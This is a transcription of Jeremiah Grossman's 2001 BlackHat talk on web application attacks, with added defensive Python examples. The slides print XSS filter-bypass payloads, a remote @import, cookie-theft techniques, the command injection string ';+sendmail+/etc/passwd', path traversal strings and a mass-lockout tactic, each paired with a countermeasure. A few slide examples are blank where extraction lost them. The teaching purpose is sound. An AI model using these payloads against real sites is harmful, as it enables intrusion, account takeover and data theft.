Web Application Security: The Land that Information Security Forgot

Today, the vast majority of those within information security have heard about web application security and possess at least a vague understanding of the risks involved. However, the multitude of attacks that make this area of security important go, for the most part, undocumented, unexplained and misunderstood. As a result, our web applications are left undefended and at the mercy of a determined attacker. To gain a deeper understanding of the threats, witnessing these attacks first hand is essential.

Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".

This discussion will cover the theory surrounding some of the more dangerous web application attacks, examples of the attacks in action, and possible countermeasures.

Jeremiah Grossman is the founder and chairman of WhiteHat Security and a former information security officer with Yahoo!. As information security officer at Yahoo!, he designed, audited and penetration-tested the huge company's web applications, which demand the highest security.

During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on the prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions, such as Defcon, the Air Force and Technology Conference, ToorCon, and others.

Jeremiah is a lead contributor to the "Open Web Application Security Project" and is considered to be among the foremost web security experts.

  1. BlackHat Amsterdam 2001
     • Web Application Security
     • The Land that Information Security Forgot.
     • Presenter: Jeremiah Grossman
     Copyright 2001 WhiteHat Security All Rights Reserved
  2. Topics
     • Web Application Security Landscape
     • Common Web Application Security Mistakes
     • Web Application Attack Methodologies
     2001 © WhiteHat Security, Inc.
  3. Topics
     • Web Application Attack Methodologies
       • Information & Discovery
       • Input Manipulation & Parameter Tampering
       • Cross-Site Scripting
       • System Mis-Configuration
  4. But Why!?
     • Easiest way to compromise hosts, networks and users.
     • Widely deployed.
     • No Logs! (POST Request payload)
     • Incredibly hard to defend against or detect.
     • Most don't think of locking down web applications.
     • Intrusion Detection is a joke.
     • Firewall? What firewall? I don't see no any firewall.
     • Encrypted transport layer does nothing.
     • Best of all, no one is looking anyway.
  5. How much easier can it get!? Oh right. Unicode
  6. Web Application: The Simple Definition
     • A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
  7. Web Security Layers
  8. The Implementation
     • Entertainment: Message Boards, WebMail, Guest Books, Voting Polls
     • E-Commerce: Shopping, Auctions, Banking, Stock Trading
     • Just Plain Crazy: Printers, PDA's, Cell Phones, System Configuration, .NET/Passport
  9. Firewall
  10. (no text on this slide)
  11. Common Web Application Security Mistakes
  12. Trusting Client-Side Data
     • DO NOT TRUST CLIENT-SIDE DATA!
     • Trusting Client-Side Data is the #1 cause of vulnerabilities.
     • Identify all input parameters that trust client-side data.
  13. Trusting Client-Side Data: The Level of Trust
     • E-Commerce Shopping
     • Numbers
       <input type=hidden value=2149.37>   2149.00   Too much for a new VAIO!
       <input type=hidden value=2.99>      2.99      Now On Sale!
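The countermeasure for the hidden-price case on slides 12 and 13, as an added example that is not code from the talk: the server keeps the only copy of the price list and recomputes the total from the item id and quantity, so a hidden field edited from 2149.37 to 2.99 changes nothing. The catalogue, the item ids and the tampered form submission are constructed for this example.

```python
"""Checkout that never trusts a client-supplied price.

Added example, not code from the original slides.  The catalogue, the
item ids and the tampered form below are constructed for illustration.
"""
from decimal import Decimal, ROUND_HALF_UP

# Constructed server-side catalogue: the only place a price may come from.
CATALOGUE = {
    "VAIO-2001": Decimal("2149.37"),
    "MOUSE-PAD": Decimal("2.99"),
}

MAX_QTY = 99


def parse_quantity(raw):
    """Accept only a small positive integer supplied as a string."""
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError("quantity must be a positive integer")
    qty = int(raw)
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    return qty


def price_order(form):
    """Compute the order total from the catalogue, not from the form.

    `form` is the decoded POST body as a dict of field -> value.  Only the
    item id and the quantity are read; every other field (including any
    'price' the client sent through a hidden input) is ignored and the
    ignored names are reported so they can be logged.
    Returns (total, ignored_field_names).
    """
    ignored = sorted(k for k in form if k not in ("item", "qty"))
    item = form.get("item")
    if item not in CATALOGUE:
        raise ValueError("unknown item")
    qty = parse_quantity(form.get("qty", "1"))
    total = (CATALOGUE[item] * qty).quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
    return total, ignored


if __name__ == "__main__":
    # Constructed tampered submission: the hidden price was edited to 2.99.
    tampered = {"item": "VAIO-2001", "qty": "1", "price": "2.99"}
    total, ignored = price_order(tampered)
    print("charged %s; ignored client fields: %s" % (total, ignored))
```

Logging the ignored field names is worth keeping: a submission that carries a `price` field the server never asked for is itself a sign that someone is editing the form.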
  14. Trusting Client-Side Data: The Level of Trust
     • Searches/Queries/Templates
     • Path
     • Or better yet…
  15. Unescaped Special Characters
     • ! @ $ % ^ & * ( ) - _ + ` ~ | [ ] { } ; : ' " ? / , . > <
     • Check for: unescaped special characters within input strings
  16. HTML Character Filtering
     • Proper handling of special characters:
       >  =>  &gt;
       <  =>  &lt;
       "  =>  &quot;
       &  =>  &amp;
     • Null characters should all be removed. %00
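The character table on slide 16 as a working encoder, added here and not part of the original slides: a single-pass replacement of `&`, `<`, `>` and `"`, plus removal of NUL in both its raw and its `%00` form, applied to a constructed search-form query string.

```python
"""Output encoding for untrusted text placed into HTML, per slide 16.

Added example; not code from the original slides.  The query string in
render_greeting is constructed for illustration.
"""
import urllib.parse

# Exactly the mapping the slide gives.  It is applied character by character
# in one pass, so the '&' produced by one replacement is never re-encoded
# by another (the classic double-encoding mistake of chained replace() calls).
HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
}


def strip_nulls(value):
    """Remove NUL bytes, both the raw byte and the still-encoded %00 form."""
    return value.replace("%00", "").replace("\x00", "")


def escape_html(value):
    """Return `value` safe to embed as element text or in a double-quoted attribute."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in strip_nulls(value))


def render_greeting(raw_query_string):
    """Build the page fragment for a search form's 'name' field.

    `raw_query_string` is the constructed URL-encoded query string a browser
    would send; parse_qs decodes it, and the decoded value is escaped once,
    at the point it is written into HTML.
    """
    params = urllib.parse.parse_qs(raw_query_string)
    name = params.get("name", [""])[0]
    return "<p>Hello, " + escape_html(name) + "</p>"


if __name__ == "__main__":
    print(render_greeting("name=%3CSCRIPT%3Ealert%28%27x%27%29%3B%3C%2FSCRIPT%3E"))
```

Because the slide's table does not cover the single quote, the output is only safe as element text or inside a double-quoted attribute; an unquoted or single-quoted attribute, an event-handler attribute, a URL attribute or a `<script>` block each need their own encoding rules.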
  17. More mistakes…
     • SUID (Does a web application really need root?)
     • Authentication mechanisms using technologies such as JavaScript or ActiveX.
     • Lack of re-authenticating the user before issuing new passwords or performing critical tasks.
     • Hosting of uncontrolled data on a protected domain.
  18. Information & Discovery
     • Spidering/Site Crawling
     • Identifiable Characteristics
     • Errors and Response Codes
     • File/Application Enumeration
     • Network Reconnaissance
  19. Spidering/Site Crawling
     • Site Map
     • Service Map
     • Documentation
     • Hidden Services
     • CGI's and Forms
     • Email addresses
     Tools: WGET
  20. Identifiable Characteristics
     • Comment Lines
     • URL Extensions
     • Meta Tags
     • Cookies
     • Client-Side scripting languages
     • Enormous wealth of information about process flows, debug commands, system types and configurations.
  21. Error and Response Codes
     • HTTP Response Headers
       Server: IBM/Apache 1.3.19
     • Cookie Characteristics
     • Error Messages
       • Exception Messages (Java / SQL)
       • 404 Error Pages
       • Failed Login
       • Locked Account
       • Database or file non-existent
  22. File/Application Enumeration
     • Commonly referred to as "forced browsing" or "CGI Scanning".
     • Directory Browsing Index Listings
     • Try:
     Tools: Whisker
  23. File/Application Enumeration
     • Sample Files
     • Template Directories
     • Temp or Backup files
     • Hidden Files
     • Vulnerable CGIs
  24. Network Reconnaissance
     • WHOIS
     • ARIN
     • Port Scan (Nmap)
     • Traceroute
     • Ping Scan (Nmap or HPING)
     • NSLookup / Reverse DNS
     • DNS Zone Transfer (DIG)
     • OS Fingerprinting (Nmap or Xprobe)
  25. Input Manipulation / Parameter Tampering: "Twiddling Bits."
     • Cross-Site Scripting
     • Filter-Bypass Manipulation
     • OS Commands
     • Meta Characters
     • Path/Directory Traversal
     • Hidden Form Field Manipulation
     • HTTP Headers
  26. Cross-Site Scripting: Bad name given to a dangerous security issue
     • Attack targets the user of the system rather than the system itself.
     • Outside client-side languages executing within the user's web environment with the same level of privilege as the hosted site.
  27. Client-Side Scripting Languages
     • DHTML (HTML, XHTML, HTML x.0): Opens all the doors.
     • JavaScript (1.x): Browser/DOM Manipulation
     • Java (Applets): Malicious Applets
     • VBScript: Browser/DOM Manipulation
     • Flash: Dangerous Third-Party Interactivity
     • ActiveX: Let me count the ways…
     • XML/XSL: Another Door Opener
     • CSS: Browser/DOM Manipulation
  28. Accessing the DOM & Outside the DOM
     • Document Object Model (DOM)
     • Client-Side languages possess an enormous amount of power to access and manipulate the DOM within a browser.
     • Complex & diverse interconnections create an increased level of access within the DOM.
     • Increased level of access to read & modify DOM data, ranging from background colors, to a file on your system, and beyond to executing system calls.
  29. Authentication/Authorization: "Hand in the cookie jar."
     • Cookies are restricted to domains.
     • Uncontrolled data on a restricted domain can access the cookie data.
     • JavaScript Expression: "document.cookie"
     • document.img.src
     • Hidden Form Submit
     • Cookie data is passed to a CGI through a GET request to an off-domain host.
  30. The Scenarios
     • Trick a user into re-logging in to a spoofed page
     • Compromise authentication credentials
     • Load dangerous or malicious ActiveX
     • Re-Direct a user or ALL users
     • Crash the machine or the browser
  31. CSS Danger: "The Remote Launch Pad."
     • Successfully CSS a user via a protected domain.
     • Utilizing a Client-Side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.
     • User is unknowingly infected/compromised within a single HTTP page load.
     • ActiveX Netcat Anyone?
  32. Dangerous HTML: "HTML Bad"
     • <APPLET>    Malicious Java Applications
     • <BODY>      Altering HTML Page Characteristics
     • <EMBED>     Embedding Third-Party Applications (Flash, etc.)
     • <FRAME>     Directly calling in other uncontrolled HTML
     • <FRAMESET>  Directly calling in other uncontrolled HTML
     • <HTML>      Altering HTML Page Characteristics
     • <IFRAME>    Directly calling in other uncontrolled HTML
     • <IMG>       SRCing Protocol attacks and other abuses
     • <LAYER>     Directly calling in other uncontrolled HTML
     • <ILAYER>    Directly calling in other uncontrolled HTML
     • <META>      META Refreshes (Client-Redirects)
     • <OBJECT>    ActiveX (Nuff Said)
     • <SCRIPT>    JavaScript/VBScript Loading
     • <STYLE>     Style Sheet and Scripting Alterations
  33. Dangerous Attributes: "Attributes Bad"
     • ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes)
       • STYLE
       • SRC
       • HREF
       • TYPE
  34. Filter Bypassing: "JavaScript is a Cockroach"
     • There are all kinds of input filters web applications implement to sanitize data.
     • This section will demonstrate many known ways input filters can be bypassed to perform malicious functions such as cross-site scripting, browser hijacking, cookie theft, and others.
     • Client-Side Scripting (CSS) attacks require the execution of either JavaScript, Java, VBScript, ActiveX, Flash or some others.
     • We will be assuming that these web applications accept HTML, at least in a limited sense.
  35. Testing the Filters
     • Submit all the raw HTML tags you can find, and then view the output results.
     • Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).
     • This will show what HTML is allowed, what the changes were, and possibly what dangerous HTML can be exploited.
  36. SCRIPT TAG
     • Description: The script tag is the simplest form of inputting JavaScript.
     • Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>
     • Solution: replace all "script" tags.
  37. SRCing JavaScript Protocol
     • Description: The JavaScript protocol will execute the expression entered after the colon. Netscape tested.
     • Exploit: <IMG SRC="javascript:alert('JavaScript Executed');">
     • Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string.
       Example: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.
     • Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation.
     • As further protocol pattern matching, the keywords "livescript" and "mocha" must also be replaced, for they hold the same possibilities. (Netscape code names)
  38. SRCing JavaScript Protocol with HTML Entities
     • Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.
     • Exploit: <IMG SRC="javasc ript:alert('JavaScript Executed');">
     • Replacement of entities 10 - 11 - 12 - 13 will also succeed.
     • Hex instead of decimal HTML entities will also bypass input filters and execute.
       <IMG SRC="javasc ript:alert('JavaScript Executed');">
     • As well as placing multiple ZEROs in front.
       <IMG SRC=javasc ript:alert('JavaScript Executed');>
     • Solution: Filter these entities within the string, then do your further pattern matching.
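Slides 37 and 38 recommend string replacement ("javascript" to "java_script") after first decoding entities. The added example below is not the talk's code; it takes the stricter route a defender would use for a SRC or HREF value: decode the HTML entities and strip the control characters that browsers ignore, which is what the browser itself does before it reads the scheme, then permit only an allowlist of schemes instead of searching for known-bad strings. That single check also covers the "livescript", "mocha" and "&{...}" variants on slides 37 and 39. The allowed-scheme set, the relative-URL character class and the sample values are choices made for this example.

```python
"""Check a SRC/HREF attribute value the way a browser will read it.

Added example, not code from the original slides.  ALLOWED_SCHEMES and
RELATIVE_OK are this example's own policy choices; the sample values in
__main__ are constructed in the shapes slides 37-39 describe.
"""
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Characters a scheme-less (relative) URL may contain; anything else fails.
RELATIVE_OK = re.compile(r"^[A-Za-z0-9_\-./?=&%#~+]+$")
# A scheme per RFC 3986: letter, then letters/digits/+/-/. up to the colon.
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def canonical(value):
    """Decode entities, then drop the characters browsers skip in a scheme.

    html.unescape handles decimal (&#10;), hex (&#x0A;), leading-zero
    (&#0000106) and semicolon-less forms, so 'javasc&#10;ript' becomes
    'javascript' once the embedded newline is stripped.
    """
    decoded = html.unescape(value)
    return "".join(ch for ch in decoded if ord(ch) > 0x20 and ord(ch) != 0x7F)


def is_safe_url(value):
    """True only for an allowlisted scheme or a plain relative reference."""
    cleaned = canonical(value)
    if not cleaned:
        return False
    m = SCHEME.match(cleaned.lower())
    if m:
        return m.group(1) in ALLOWED_SCHEMES
    # No scheme: a 'java_script:' or '&{...}' value lands here and is
    # rejected by the character class rather than by a keyword search.
    return RELATIVE_OK.match(cleaned) is not None


if __name__ == "__main__":
    for sample in ("http://server/images/logo.png", "/images/logo.png",
                   "javasc&#10;ript:alert(1)", "&#0000106avascript:alert(1)",
                   "&{alert('JavaScript Executed')};", "java_script:alert(1)"):
        print("%-40s %s" % (sample, "allowed" if is_safe_url(sample) else "rejected"))
```

Note what the allowlist buys over the slide's replacement: a scheme the filter author never heard of (the `data:` URL, for instance) is rejected by default rather than passing because no blocklist entry matched it, and the whitespace-splitting tricks of slide 38 stop mattering because the comparison happens after canonicalisation.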
  39. AND CURLY
     • Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.
     • Exploit: <IMG SRC="&{alert('JavaScript Executed')};">
     • Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem.
  40. Style Tag Conversion
     • Description: Turn a style tag into a JavaScript expression.
     • Exploit: <style TYPE="text/javascript">JS EXPRESSION</style>
     • Solution: Replace the "javascript" string with "java_script" and all should be fine.
     • Exploit: Import dangerous CSS.
       <STYLE type=text/css>
       @import url(http://server/very_bad.css);
       </STYLE>
     • Solution: Filter and replace the "@import".
     • Exploit: Import a JavaScript expression through a style tag.
       <style TYPE="text/css">
       @import url(javascript:alert('JavaScript Executed'));   IE HOLE
       </style>
     • Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.
  41. Using CSS
     • Click to Execute: User must click on a link to execute the script. (Search Fields, 404 Errors, etc.)
       <SCRIPT>alert('JavaScript Launched');</SCRIPT>
     • Mass Injection: All users viewing the page execute the script. (Guest Books, Message Boards)
       Post a JavaScript onto a board:
       Message <SCRIPT>alert('JavaScript Launched');</SCRIPT>
  42. Using CSS
     • Directed Injection: As soon as the user loads the page, the script executes. (WebMail, HTML Mail, Messaging)
       Send an email with…
       HELLO <SCRIPT>alert('JavaScript Launched');</SCRIPT>
     • Holding the door open (FeedBack, Profile Pages, anything persistent…)
       Load HTML Page with sourced scripts.
       <LAYER SRC="javascript.js"></LAYER>
  43. Twiddling Bits
     • OS Commands
     • Meta Characters
     • Path/Directory Traversal
  44. Power of the Semi-Colon: piping input to the command line.
     • OS Commands
       Append:     ;+sendmail+/etc/passwd
       Piping:     |+less
       Re-Direct:  >+/
  45. Power of Special Characters: piping input to the command line.
     • Meta Characters
       Altered:    *
  46. Power of the Dots and Slashes: piping input to the command line.
     • Path Directory Traversal
       DotDot Slash:
       Dot Slash:
       Double DotDot Slash:  ....//....//etc/passwd
  47. More Filter Bypassing
     • Method Alteration (HEAD, PUT, POST, GET, etc.)
     • URL Encode
     • Null Characters
     • More… Alternate Case, Unicode, String Length, Multi-Slash, etc.
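For the command-line and path-traversal payloads on slides 44 to 47 the defence is the same in both cases: canonicalise the value first (percent-decode, resolve the path), then check it against an allowlist, and never hand it to a shell. The example below is added here and is not from the talk; the base directory, the `report.txt` file and the `/usr/local/bin/lookup` program are constructed or hypothetical. Because the check runs on the resolved path rather than on the raw string, the "....//" double-dot trick of slide 46 and the URL-encoded, null-byte and multi-slash variants of slide 47 are all handled by the same few lines.

```python
"""Canonicalise-then-check for a file parameter, and argv building without a shell.

Added example, not code from the original slides.  make_demo_dir builds a
constructed document root; '/usr/local/bin/lookup' is a hypothetical program.
"""
import os
import re
import tempfile
import urllib.parse

# Allowlist for a value that ends up as a command-line argument.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def safe_path(base_dir, user_value):
    """Resolve `user_value` under `base_dir`; return the real path or None.

    Order matters: percent-decode first so %2e%2e%2f is seen for what it is;
    refuse NUL before any filesystem call (it would truncate a C path);
    realpath collapses '../', './', '....//', '//' and symlinks; the final
    containment test is on the resolved path, so stripping '../' once and
    being fooled by '....//' cannot happen.  An absolute user value makes
    os.path.join discard base_dir, which the containment test also catches.
    """
    decoded = urllib.parse.unquote(user_value)
    if "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None
    return target


def lookup_argv(username):
    """Build an argument vector for the hypothetical lookup tool.

    The value is validated against SAFE_TOKEN and passed as its own argv
    element (for subprocess.run with a list, no shell), so ';', '|', '>'
    and '*' are ordinary characters with no meaning, and on top of that
    the allowlist rejects them outright.
    """
    if not SAFE_TOKEN.match(username):
        raise ValueError("invalid username")
    return ["/usr/local/bin/lookup", username]  # hypothetical program path


def make_demo_dir():
    """Create a throwaway document root holding one constructed file."""
    base = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(base, "report.txt"), "w") as fh:
        fh.write("quarterly report (constructed sample)\n")
    return base


if __name__ == "__main__":
    root = make_demo_dir()
    for value in ("report.txt", "../../../../etc/passwd",
                  "..%2F..%2Fetc%2Fpasswd", "....//....//etc/passwd",
                  "report.txt%00.jpg"):
        print("%-28s -> %s" % (value, safe_path(root, value)))
    print(lookup_argv("jeremiah"))
```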
  48. More bits…
     • Hidden Form Field Manipulation
     • HTTP Headers (Cookies, Referers…)
  49. System Mis-Configurations: "patches, patches, and more patches…"
     • Vendor Patches
     • Default Accounts
     • Check:
       • Web Server permissions by directory browsing
       • Software version from Discovery
       • Known default accounts in commercial platforms
       • BugTraq
       • Anonymous FTP open on Web Server
  50. Other Dirty Tricks: "Abuse can be far more time consuming, costly and dangerous"
     • Mass Account Lockout: attacks against brute force
     • 3 Time Failure Lock-Out Rule
     • Purposely fail the 3 attempts against thousands of accounts. If the login is sequential, even better.
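One way to keep a failed-login rule without handing an attacker the mass-lockout lever of slide 50, added as an example that is not from the talk: a short, growing cool-down per account instead of a permanent lock, plus a hard refusal per client address once that address has produced many failures. The thresholds, timings and 10.0.0.x addresses are constructed for this example, and `now` is passed in rather than read from the clock so the replay is deterministic.

```python
"""A failed-login policy that resists the mass-lockout abuse on slide 50.

Added example, not code from the original slides.  Thresholds, timings,
account names and client addresses are constructed choices.
"""
from collections import defaultdict

ACCOUNT_SOFT_THRESHOLD = 3   # failures before an account gets a cool-down
ACCOUNT_MAX_COOLDOWN = 300   # seconds; an account is never locked for good
CLIENT_HARD_THRESHOLD = 10   # failures from one client address before it is refused
WINDOW = 900                 # seconds; older failures are forgotten


class LoginThrottle:
    """Tracks failed logins per account and per client address."""

    def __init__(self):
        self.account_failures = defaultdict(list)  # account -> failure timestamps
        self.client_failures = defaultdict(list)   # client  -> failure timestamps

    @staticmethod
    def _recent(stamps, now):
        return [t for t in stamps if now - t <= WINDOW]

    def check(self, account, client, now):
        """Return (allowed, reason).  Call before the password is verified."""
        cf = self.client_failures[client] = self._recent(self.client_failures[client], now)
        if len(cf) >= CLIENT_HARD_THRESHOLD:
            return False, "client refused"
        af = self.account_failures[account] = self._recent(self.account_failures[account], now)
        excess = len(af) - ACCOUNT_SOFT_THRESHOLD
        if excess >= 0:
            # 1 s after the third failure, doubling per further failure, capped.
            cooldown = min(2 ** excess, ACCOUNT_MAX_COOLDOWN)
            if now - af[-1] < cooldown:
                return False, "account cooling down"
        return True, "ok"

    def record(self, account, client, success, now):
        """Record the outcome of a password check that `check` allowed."""
        if success:
            self.account_failures.pop(account, None)
        else:
            self.account_failures[account].append(now)
            self.client_failures[client].append(now)


def mass_lockout_scenario():
    """Constructed replay of slide 50: one client fails three times against
    each of five accounts (one attempt per second), then the real owner of
    'user0' tries from a different address."""
    th = LoginThrottle()
    attacker, victim = "10.0.0.1", "10.0.0.9"  # constructed addresses
    t = 0
    attacker_refused_at = None
    for i in range(5):
        account = "user%d" % i
        for _ in range(3):
            allowed, _reason = th.check(account, attacker, t)
            if allowed:
                th.record(account, attacker, success=False, now=t)  # wrong password
            elif attacker_refused_at is None:
                attacker_refused_at = t
            t += 1
    return {
        "attacker_refused_at": attacker_refused_at,
        # right after the third failure the account is cooling down for 1 s ...
        "victim_refused_at_t2": not th.check("user0", victim, 2)[0],
        # ... but a few seconds later its owner can log in from her own address
        "victim_allowed_at_t20": th.check("user0", victim, 20)[0],
    }


if __name__ == "__main__":
    print(mass_lockout_scenario())
```

The per-client counter is what removes the lever: the attacker's address is refused after ten failures, long before it can touch thousands of accounts, while each victim account only ever sees a cool-down of seconds that expires on its own. In a real deployment the per-client key would also need to consider shared proxies and address rotation, which is why the per-account cool-down stays in place as the second layer.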
  51. Other Dirty Tricks: "Abuse can be far more time consuming, costly and dangerous"
     • Brute Force/Page Sequencing: attacks against process flow
     • Use 1 or 2 pieces of data to get the rest.
     • Slowly brute force the process for data aggregation.
  52. Thank You BlackHat and Attendees. Questions?
     • Jeremiah Grossman
     • [email_address]
     • WhiteHat Security
     • All presentation updates will be available on